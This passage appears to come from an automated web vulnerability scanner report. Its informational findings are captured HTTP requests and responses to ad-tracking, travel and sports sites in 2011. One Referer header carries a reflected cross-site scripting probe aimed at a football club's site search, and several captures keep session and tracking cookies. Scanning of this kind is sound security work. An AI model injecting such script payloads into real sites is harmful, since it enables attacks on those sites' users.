GET /0/KantarMedia-Panel/panel/set_panel.html?054612530__!__http://kantarmedia.guardian.co.uk__!__&Paneled_Site=guardian.co.uk&Paneled_Section=football HTTP/1.1
Host: panel.kantarmedia.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.guardian.co.uk/football/manchester-united
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Sun, 02 Oct 2011 23:51:21 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Type: text/html
Content-Length: 1967

<script type="text/javascript">
   var d=document;
   
   function cookie_check(ifd,ife){
    var s=ife.indexOf(ifd);
    if(s===-1)return "";
    s+=ifd.length;
    var e=ife.indexOf(";",s);
    if(e===
...[SNIP]...
27.45. http://pixel.invitemedia.com/data_sync  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://pixel.invitemedia.com
Path:   /data_sync

Request

GET /data_sync?partner_id=101&exchange_id=9 HTTP/1.1
Host: pixel.invitemedia.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.goal.com/en/news/9/england/2011/10/01/2691360/anderson-confident-manchester-united-will-keep-unbeaten-run
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: optout=*

Response

HTTP/1.0 200 OK
Server: IM BidManager
Date: Sun, 02 Oct 2011 23:59:01 GMT
P3P: policyref="/w3c/p3p.xml", CP="OTI DSP COR ADMo TAIo PSAo PSDo CONo OUR SAMo OTRo STP UNI PUR COM NAV INT DEM STA PRE LOC"
Expires: Sun, 02-Oct-2011 23:58:41 GMT
Content-Type: text/html
Pragma: no-cache
Cache-Control: no-cache
Content-Length: 572

<html>
<body>
<script type="text/javascript">
makePixelRequest("http://tags.bluekai.com/site/2748?redir=http%3A%2F%2Fsegment-pixel.invitemedia.com%2Fset_partner_uid%3FpartnerID
...[SNIP]...
27.46. http://showadsak.pubmatic.com/AdServer/AdServerServlet  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://showadsak.pubmatic.com
Path:   /AdServer/AdServerServlet

Request

GET /AdServer/AdServerServlet?operId=2&pubId=26071&siteId=26072&adId=21044&kadwidth=160&kadheight=600&kbgColor=ffffff&ktextColor=000000&klinkColor=0000EE&pageURL=http://dm.travelocity.com/html.ng/adsize=160x600&site=travelocity&cobrand=TRAVELOCITY&locale=en&pagepos=2&area=hotel&dest=BOS&paxa=0&paxs=0&paxc=0&random=529176&tile=711446054649628&section=results&frameName=http_dm_travelocity_comhtml_ngadsize=160x600&site=travelocity&cobrand=TRAVELOCITY&locale=en&pagepos=2&area=hotel&dest=BOS&paxa=0&paxs=0&paxc=0&random=529176&tile=711446054649628&section=resultskomli_ads_frame12607126072&kltstamp=2011-9-2%2019%3A9%3A0&ranreq=0.38537488016299903&timezone=-5&screenResolution=1920x1200&inIframe=1&adPosition=-1x-1&adVisibility=0 HTTP/1.1
Host: showadsak.pubmatic.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://dm.travelocity.com/html.ng/adsize=160x600&site=travelocity&cobrand=TRAVELOCITY&locale=en&pagepos=2&area=hotel&dest=BOS&paxa=0&paxs=0&paxc=0&random=529176&tile=711446054649628&section=results
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: KRTBCOOKIE_57=476-uid:6422714091563403120; KRTBCOOKIE_107=1471-uid:NPgmRuqc1g7o5ImOP5HZYnndqUL92n1F; KRTBCOOKIE_148=1699-uid:439524AE8C6B634E021F5F7802166020; KADUSERCOOKIE=55785307-A5DC-4E3A-B452-DDBD426D3A1D; PMAT=0; KRTBCOOKIE_80=1336-d454714d-69b5-4195-969b-ba426f1012c3.; KRTBCOOKIE_58=1344-OO-00000000000000000; KRTBCOOKIE_22=488-pcv:1|uid:2944787775510337379; KRTBCOOKIE_27=1216-uid:; KRTBCOOKIE_218=4056--5675633421699857517=; KRTBCOOKIE_200=3683-d0f5e0cea474; KRTBCOOKIE_16=226-3620501663059719663; PUBMDCID=1; PUBRETARGET=78_1409703834.82_1409705283.571_1410012888.806_1346872847.390_1323779603.445_1323779616.362_1318595605.76_1318595649.70_1318595646.2191_1331555757.2018_1318595758

Response

HTTP/1.1 200 OK
Server: Apache/2.2.4 (Unix) DAV/2 mod_ssl/2.2.4 OpenSSL/0.9.7a mod_fastcgi/2.4.2
Vary: Accept-Encoding
P3P: CP="NOI DSP COR LAW CUR ADMo DEVo TAIo PSAo PSDo IVAo IVDo HISo OTPo OUR SAMo BUS UNI COM NAV INT DEM CNT STA PRE LOC"
Cache-Control: no-store, no-cache, private
Pragma: no-cache
Content-Type: text/html
Date: Mon, 03 Oct 2011 00:09:11 GMT
Content-Length: 1710
Connection: close
Set-Cookie: PUBMDCID=1; domain=pubmatic.com; expires=Tue, 02-Oct-2012 00:09:11 GMT; path=/
Set-Cookie: pubfreq_26072_21044_1115692444=823-1; domain=pubmatic.com; expires=Mon, 03-Oct-2011 00:49:11 GMT; path=/
Set-Cookie: PMDTSHR=cat:; domain=pubmatic.com; expires=Tue, 04-Oct-2011 00:09:11 GMT; path=/

document.write('<div id="http_dm_travelocity_comhtml_ngadsize" style="position: absolute; margin: 0px 0px 0px 0px; height: 0px; width: 0px; top: -10000px; " clickdata=12UAANhlAAA0UgAAAAAAAAAAAAAAAAAAA
...[SNIP]...
27.47. http://tags.bluekai.com/site/2565  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://tags.bluekai.com
Path:   /site/2565

Request

GET /site/2565?ret=html&phint=u1=Hotel&phint=u2=178239&phint=u4=20111004%7C20111007&phint=u6=1&phint=u7=1%7C0&phint=u9=The%20Boston%20Park%20Plaza%20Hotel%20&%20Towers&phint=u11=35&phint=u13=4215&phint=u14=429&phint=u15= HTTP/1.1
Host: tags.bluekai.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://fls.doubleclick.net/activityi;src=2588797;type=nausc826;cat=nausi956;u=CCF4A420AF8B480F8413EFB42E880287;u1=Hotel;u4=20111004%7C20111007;u2=178239;u6=1;u7=1%7C0;u9=The%20Boston%20Park%20Plaza%20Hotel%20&%20Towers;u11=35;u13=4215;u14=429;u16=USD;ord=7232943603303.283?
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BKIgnore=1

Response

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 00:14:14 GMT
Server: Apache/2.2.3 (CentOS)
P3P: CP="NOI DSP COR CUR ADMo DEVo PSAo PSDo OUR SAMo BUS UNI NAV", policyref="http://tags.bluekai.com/w3c/p3p.xml"
BK-Server: 160f
Content-Length: 40
Content-Type: text/html

<html><head></head><body></body></html>
27.48. http://tags.bluekai.com/site/2625  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://tags.bluekai.com
Path:   /site/2625

Request

GET /site/2625?ret=html&phint=u1=Hotel&phint=u2=178239&phint=u3=&phint=u4=20111004%7C20111007&phint=u5=&phint=u6=1&phint=u7=1%7C0&phint=u8=&phint=u9=&phint=u10=&phint=u11=0&phint=u12=&phint=u13=4215%7C15861%7C23415%7C1680030%7C2800816&phint=u14=429.0%7C339.15%7C289.0%7C432.33%7C308.54&phint=u16=USD&phint=u20= HTTP/1.1
Host: tags.bluekai.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://fls.doubleclick.net/activityi;src=2588797;type=nausc826;cat=nauss008;ord=2134735815;u=ccf4a420af8b480f8413efb42e880287;u1=Hotel;u2=178239;u4=20111004%7C20111007;u6=1;u7=1%7C0;u9=;u11=0;u12=;u13=4215%7C15861%7C23415%7C1680030%7C2800816;u14=429.0%7C339.15%7C289.0%7C432.33%7C308.54;u16=USD
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BKIgnore=1

Response

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 00:11:28 GMT
Server: Apache/2.2.3 (CentOS)
P3P: CP="NOI DSP COR CUR ADMo DEVo PSAo PSDo OUR SAMo BUS UNI NAV", policyref="http://tags.bluekai.com/w3c/p3p.xml"
BK-Server: f778
Content-Length: 40
Content-Type: text/html

<html><head></head><body></body></html>
27.49. http://uxm.thousandeyes.com/rest/json  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://uxm.thousandeyes.com
Path:   /rest/json

Request

GET /rest/json?data={%22aid%22:%2211%22,%22sid%22:%22D5E8C261-B1E7-4A8B-AEEE-A8B3463F3408%22,%22r%22:265892,%22si%22:1,%22url%22:%22http://www.agoda.com/%22,%22ua%22:%22Mozilla/5.0%20(Windows%20NT%206.1;%20WOW64)%20AppleWebKit/535.1%20(KHTML,%20like%20Gecko)%20Chrome/14.0.835.187%20Safari/535.1%22,%22dlt%22:10244,%22clt%22:29183,%22dcl%22:37693,%22lt%22:37694,%22nt%22:0,%22rc%22:0,%22ft%22:2013,%22dt%22:0,%22ct%22:0,%22sct%22:null,%22rqt%22:2006,%22rpt%22:2,%22let%22:1,%22nl%22:1886} HTTP/1.1
Host: uxm.thousandeyes.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.agoda.com/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 00:40:45 GMT
Server: Apache/2.2.14 (Ubuntu)
P3P: policyref='/p3p/p3p.xml', CP='NOI NID HISa OTPa OUR UNRa BUS COM NAV'
Set-Cookie: _uxm_cid=D5E8C261-B1E7-4A8B-AEEE-A8B3463F3408; Domain=.thousandeyes.com; Expires=Tue, 02-Oct-2012 00:40:45 GMT
Vary: Accept-Encoding
Content-Length: 2
Content-Type: text/html

OK
27.50. http://www.aon.com/manchesterunited/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.aon.com
Path:   /manchesterunited/

Request

GET /manchesterunited/ HTTP/1.1
Host: www.aon.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.aon.com/unitedin2010/?lid=aonbutton
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=FDA5F4B4BB1AB049D12027B006BB7DA5

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Content-Type: text/html
Date: Sun, 02 Oct 2011 23:59:06 GMT
Content-Length: 12997

<!DOCTYPE html>
<html lang="en">
   <head>
       <meta charset="utf-8" />
       <title> Aon and Manchester United: We are United </title>
       <link rel="stylesheet" href="styles.css" media="screen"/>
       <scr
...[SNIP]...
27.51. http://www.aon.com/unitedin2010/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.aon.com
Path:   /unitedin2010/

Request

GET /unitedin2010/?lid=aonbutton HTTP/1.1
Host: www.aon.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.manutd.com/Search-Results.aspx?qs=manutd_frontend&catTxt=&searchText=xss75931%3Cscript%3Ealert(document.location)%3C/script%3E14fb8fbf954
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Content-Type: text/html
Content-Length: 103
Date: Sun, 02 Oct 2011 23:59:04 GMT

<SCRIPT LANGUAGE="JavaScript">
window.location.href="http://www.aon.com/manchesterunited/";
</script>
27.52. http://www.aon.com/unitedin2010/index.jsp  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.aon.com
Path:   /unitedin2010/index.jsp

Request

GET /unitedin2010/index.jsp HTTP/1.1
Host: www.aon.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.aon.com/default.jsp
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=FDA5F4B4BB1AB049D12027B006BB7DA5; s_pers=%20gpv_pageName%3D/default.jsp%7C1317601819055%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3Daoncomprod%253D%252526pid%25253D/default.jsp%252526pidt%25253D1%252526oid%25253Dhttp%2525253A//www.aon.com/unitedin2010/index.jsp%252526ot%25253DA%3B

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Content-Type: text/html
Content-Length: 103
Date: Mon, 03 Oct 2011 00:01:31 GMT

<SCRIPT LANGUAGE="JavaScript">
window.location.href="http://www.aon.com/manchesterunited/";
</script>
27.53. http://www.burstnet.com/cgi-bin/ads/ad22156a.cgi/v=2.3S/sz=300x250A/NZ/9460/NF/RETURN-CODE/JS/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.burstnet.com
Path:   /cgi-bin/ads/ad22156a.cgi/v=2.3S/sz=300x250A/NZ/9460/NF/RETURN-CODE/JS/

Request

GET /cgi-bin/ads/ad22156a.cgi/v=2.3S/sz=300x250A/NZ/9460/NF/RETURN-CODE/JS/ HTTP/1.1
Host: www.burstnet.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.goal.com/en/news/9/england/2011/10/01/2691360/anderson-confident-manchester-united-will-keep-unbeaten-run
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BOO=opt-out

Response

HTTP/1.1 200 OK
Server: Apache (Unix)
P3P: policyref="http://www.burstnet.com/w3c/p3p.xml", CP="NOI DSP LAW PSAa PSDa OUR IND UNI COM NAV STA"
Ad-Reach: Burst!Media
Pragma: no-cache
Cache-Control: no-cache
Content-Type: text/html
Vary: Accept-Encoding
Content-Length: 248
Date: Sun, 02 Oct 2011 23:58:59 GMT
Connection: close
Set-Cookie: TID=1; path=/; expires=Mon, 04-Jul-2011 23:58:58 GMT; domain=.burstnet.com
Set-Cookie: /ad22156.11567=,CFC,GFC; path=/
Set-Cookie: TData=1; path=/; expires=Mon, 04-Jul-2011 23:58:58 GMT; domain=.burstnet.com
Set-Cookie: CMS=1; path=/; expires=Mon, 04-Jul-2011 23:58:58 GMT; domain=.burstnet.com
Set-Cookie: CMP=1; path=/; expires=Mon, 04-Jul-2011 23:58:58 GMT; domain=.burstnet.com
Set-Cookie: __qca=1; path=/; expires=Mon, 04-Jul-2011 23:58:58 GMT; domain=.burstnet.com
Set-Cookie: /PC=0; path=/; expires=Sun, 09-Oct-2011 23:58:58 GMT
Set-Cookie: /SC=0-2vc.1; path=/


<!--
var cb = Math.random();
var d = document;
d.write('<script language="JavaScript" type="text/javascript"');
d.write('src="http://optimized-by.rubiconproject.com/a/7743/12359/21900-15.js?cb=
...[SNIP]...
27.54. http://www.cheaptickets.com/cacheable/ad.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.cheaptickets.com
Path:   /cacheable/ad.html

Request

GET /cacheable/ad.html HTTP/1.1
Host: www.cheaptickets.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.cheaptickets.com/shop/hotelsearch?type=hotel&hotel.keyword.key=bos&hotel.rooms[0].adlts=1&hotel.type=keyword&hotel.chkin=10/09/11&hotel.chkout=10/16/11&search=Search&DCSext.mc_kw=&WT.mc_ev=click&WT.mc_id=c_trip_hot&gcid=C16036x354&lpid=plhot
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: anon=7567558764917771317602252; NSC_xxx.difbqujdlfut.dpn.80_gxe=ffffffff09e3887845525d5f4f58455e445a4a423660; JSESSIONID=E880BFD3C49D42E3; logging=E880BFD3C49D42E3||egapp2218p.prod.orbitz.net; curr=USD; BetaGroup="10/02/2011 19:37:33|B|A|C|C|C|H|B|P|A"; TrafficGroup="10/02/2011 19:37:33|P"; myTests=%3A%7C%3A%7C%3A%7C%3A%7C%3A%7CUBP_ErrorMessaging%3A%7C%3A%7C%3A%7C%3A%7C%3A%7Cv1; MKTG=ABCDEFGHU0VNfEMxNjAzNngzNTR8IHwxMzE3NjAyMjUzMjI3fEMxNjAzNngzNTR8fDEwLzAyLzIwMTEgMTk6Mzc6MzMgUE18IHwg; dpc=HOTEL%7C2.2%7C%7Cbos%7C%7C%7CUS%7C%7C%7C+%26%26HB%7C%7C2011-10-09%7C2011-10-16%7C%7C+%7C%26%26HE; NSC_JOu2s3r4deikrvveb50lfpcjwwizbbq=ffffffff09e33a3045525d5f4f58455e445a4a4217b9; mbox=check#true#1317602329|session#1317602268649-666039#1317604129

Response

HTTP/1.1 200 OK
Last-Modified: Mon, 26 Sep 2011 15:42:24 GMT
ETag: "30a-4adda015a1800"
Cache-Control: max-age=14400
Expires: Mon, 03 Oct 2011 03:51:09 GMT
Content-Type: text/html
Cteonnt-Length: 778
Server: Apache
Date: Mon, 03 Oct 2011 00:38:11 GMT
Age: 2822
Connection: keep-alive
Content-Length: 778

<html>
   <head></head>
   <body onLoad="window.adLoaded=true;" onUnload="window.adLoaded=false;" style="background-color:transparent">
       <script type="text/javascript">
           function waitForAdURL(timeout)
...[SNIP]...
27.55. http://www.cheaptickets.com/cacheable/ad_empty.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.cheaptickets.com
Path:   /cacheable/ad_empty.html

Request

GET /cacheable/ad_empty.html HTTP/1.1
Host: www.cheaptickets.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.cheaptickets.com/shop/hotelsearch?type=hotel&hotel.keyword.key=bos&hotel.rooms[0].adlts=1&hotel.type=keyword&hotel.chkin=10/09/11&hotel.chkout=10/16/11&search=Search&DCSext.mc_kw=&WT.mc_ev=click&WT.mc_id=c_trip_hot&gcid=C16036x354&lpid=plhot
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: anon=7567558764917771317602252; NSC_xxx.difbqujdlfut.dpn.80_gxe=ffffffff09e3887845525d5f4f58455e445a4a423660; JSESSIONID=E880BFD3C49D42E3; logging=E880BFD3C49D42E3||egapp2218p.prod.orbitz.net; curr=USD; BetaGroup="10/02/2011 19:37:33|B|A|C|C|C|H|B|P|A"; TrafficGroup="10/02/2011 19:37:33|P"; myTests=%3A%7C%3A%7C%3A%7C%3A%7C%3A%7CUBP_ErrorMessaging%3A%7C%3A%7C%3A%7C%3A%7C%3A%7Cv1; MKTG=ABCDEFGHU0VNfEMxNjAzNngzNTR8IHwxMzE3NjAyMjUzMjI3fEMxNjAzNngzNTR8fDEwLzAyLzIwMTEgMTk6Mzc6MzMgUE18IHwg; dpc=HOTEL%7C2.2%7C%7Cbos%7C%7C%7CUS%7C%7C%7C+%26%26HB%7C%7C2011-10-09%7C2011-10-16%7C%7C+%7C%26%26HE; NSC_JOu2s3r4deikrvveb50lfpcjwwizbbq=ffffffff09e33a3045525d5f4f58455e445a4a4217b9; mbox=check#true#1317602329|session#1317602268649-666039#1317604129

Response

HTTP/1.1 200 OK
Last-Modified: Mon, 26 Sep 2011 15:42:24 GMT
ETag: "2e-4adda015a1800"
Cache-Control: max-age=14400
Expires: Mon, 03 Oct 2011 03:47:42 GMT
Content-Type: text/html
ntCoent-Length: 46
Server: Apache
Date: Mon, 03 Oct 2011 00:39:28 GMT
Age: 3106
Connection: keep-alive
Content-Length: 46

<html><head></head><body>&nbsp;</body></html>
27.56. http://www.cheaptickets.com/cacheable/cedexis/radar.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.cheaptickets.com
Path:   /cacheable/cedexis/radar.html

Request

GET /cacheable/cedexis/radar.html HTTP/1.1
Host: www.cheaptickets.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.cheaptickets.com/shop/hotelsearch?type=hotel&hotel.keyword.key=bos&hotel.rooms[0].adlts=1&hotel.type=keyword&hotel.chkin=10/09/11&hotel.chkout=10/16/11&search=Search&DCSext.mc_kw=&WT.mc_ev=click&WT.mc_id=c_trip_hot&gcid=C16036x354&lpid=plhot
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: anon=7567558764917771317602252; NSC_xxx.difbqujdlfut.dpn.80_gxe=ffffffff09e3887845525d5f4f58455e445a4a423660; JSESSIONID=E880BFD3C49D42E3; logging=E880BFD3C49D42E3||egapp2218p.prod.orbitz.net; BetaGroup="10/02/2011 19:37:33|B|A|C|C|C|H|B|P|A"; TrafficGroup="10/02/2011 19:37:33|P"; myTests=%3A%7C%3A%7C%3A%7C%3A%7C%3A%7CUBP_ErrorMessaging%3A%7C%3A%7C%3A%7C%3A%7C%3A%7Cv1; MKTG=ABCDEFGHU0VNfEMxNjAzNngzNTR8IHwxMzE3NjAyMjUzMjI3fEMxNjAzNngzNTR8fDEwLzAyLzIwMTEgMTk6Mzc6MzMgUE18IHwg; dpc=HOTEL%7C2.2%7C%7Cbos%7C%7C%7CUS%7C%7C%7C+%26%26HB%7C%7C2011-10-09%7C2011-10-16%7C%7C+%7C%26%26HE; NSC_JOu2s3r4deikrvveb50lfpcjwwizbbq=ffffffff09e33a3045525d5f4f58455e445a4a4217b9; mbox=check#true#1317602329|session#1317602268649-666039#1317604129; curr=USD; WT_FPC=id=50.23.123.106-1472814720.30179680:lv=1317598702248:ss=1317598702061

Response

HTTP/1.1 200 OK
Last-Modified: Mon, 26 Sep 2011 15:42:24 GMT
ETag: "292-4adda015a1800"
Cache-Control: max-age=14400
Expires: Mon, 03 Oct 2011 03:56:30 GMT
Content-Type: text/html
Cteonnt-Length: 658
Server: Apache
Date: Mon, 03 Oct 2011 00:40:18 GMT
Age: 2628
Connection: keep-alive
Content-Length: 658

<html>
   <head>
       <script type="text/javascript">
           var radarSettings = {
               zoneId: '1',
               customerId: '10325'
           };
           (function(d, w) {
               var onWindowLoaded = function() {
                   var a = docum
...[SNIP]...
27.57. http://www.cheaptickets.com/cacheable/empty.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.cheaptickets.com
Path:   /cacheable/empty.html

Request

GET /cacheable/empty.html HTTP/1.1
Host: www.cheaptickets.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.cheaptickets.com/shop/hotelsearch?type=hotel&hotel.keyword.key=bos&hotel.rooms[0].adlts=1&hotel.type=keyword&hotel.chkin=10/09/11&hotel.chkout=10/16/11&search=Search&DCSext.mc_kw=&WT.mc_ev=click&WT.mc_id=c_trip_hot&gcid=C16036x354&lpid=plhot
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: anon=7567558764917771317602252; NSC_xxx.difbqujdlfut.dpn.80_gxe=ffffffff09e3887845525d5f4f58455e445a4a423660; JSESSIONID=E880BFD3C49D42E3; logging=E880BFD3C49D42E3||egapp2218p.prod.orbitz.net; curr=USD; BetaGroup="10/02/2011 19:37:33|B|A|C|C|C|H|B|P|A"; TrafficGroup="10/02/2011 19:37:33|P"; myTests=%3A%7C%3A%7C%3A%7C%3A%7C%3A%7CUBP_ErrorMessaging%3A%7C%3A%7C%3A%7C%3A%7C%3A%7Cv1; MKTG=ABCDEFGHU0VNfEMxNjAzNngzNTR8IHwxMzE3NjAyMjUzMjI3fEMxNjAzNngzNTR8fDEwLzAyLzIwMTEgMTk6Mzc6MzMgUE18IHwg; dpc=HOTEL%7C2.2%7C%7Cbos%7C%7C%7CUS%7C%7C%7C+%26%26HB%7C%7C2011-10-09%7C2011-10-16%7C%7C+%7C%26%26HE; NSC_JOu2s3r4deikrvveb50lfpcjwwizbbq=ffffffff09e33a3045525d5f4f58455e445a4a4217b9; mbox=check#true#1317602329|session#1317602268649-666039#1317604129

Response

HTTP/1.1 200 OK
Last-Modified: Mon, 26 Sep 2011 15:42:24 GMT
ETag: "8-4adda015a1800"
Cache-Control: max-age=14400
Expires: Mon, 03 Oct 2011 03:55:56 GMT
Content-Type: text/html
Cteonnt-Length: 8
Server: Apache
Date: Mon, 03 Oct 2011 00:38:15 GMT
Age: 2539
Connection: keep-alive
Content-Length: 8

<!-- -->
27.58. http://www.cmegroup.com/advance/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.cmegroup.com
Path:   /advance/

Request

GET /advance/ HTTP/1.1
Host: www.cmegroup.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://spe.atdmt.com/ds/DWDWCCMEXCME/Collective_Trade_728x90.swf?ver=1&clickTag1=http://clk.specificclick.net/click/v=5;m=2;l=24038;c=178619;b=1058368;ts=20111002201331;dct=http://clk.atdmt.com/go/352348532/direct;ai.209087168;ct.1/01&clickTag=http://clk.specificclick.net/click/v=5;m=2;l=24038;c=178619;b=1058368;ts=20111002201331;dct=http://clk.atdmt.com/go/352348532/direct;ai.209087168;ct.1/01
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utma=239709073.1864766951.1315448948.1315448948.1315448948.1; __utmz=239709073.1315448948.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none)

Response

HTTP/1.1 200 OK
Server: Apache/2.2.17 (Unix) mod_ssl/2.2.17 OpenSSL/0.9.8e-fips-rhel5
Accept-Ranges: bytes
Vary: Accept-Encoding
Content-Length: 9275
Content-Type: text/html
Date: Mon, 03 Oct 2011 00:26:39 GMT
Connection: close
Set-Cookie2: Apache=128.241.91.4.1317601599674056; path=/; max-age=1209600; domain=.cmegroup.com; version=1


<!DOCTYPE html>
<html lang="en-us" class="no-js">
<head>
<meta charset="utf-8" />
<meta http-equiv="X-UA-Compatible" content="IE=edge,chrome=1" />
<meta name="fragment" content="!">

   
...[SNIP]...
27.59. http://www.cmegroup.com/advance/about.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.cmegroup.com
Path:   /advance/about.html

Request

GET /advance/about.html HTTP/1.1
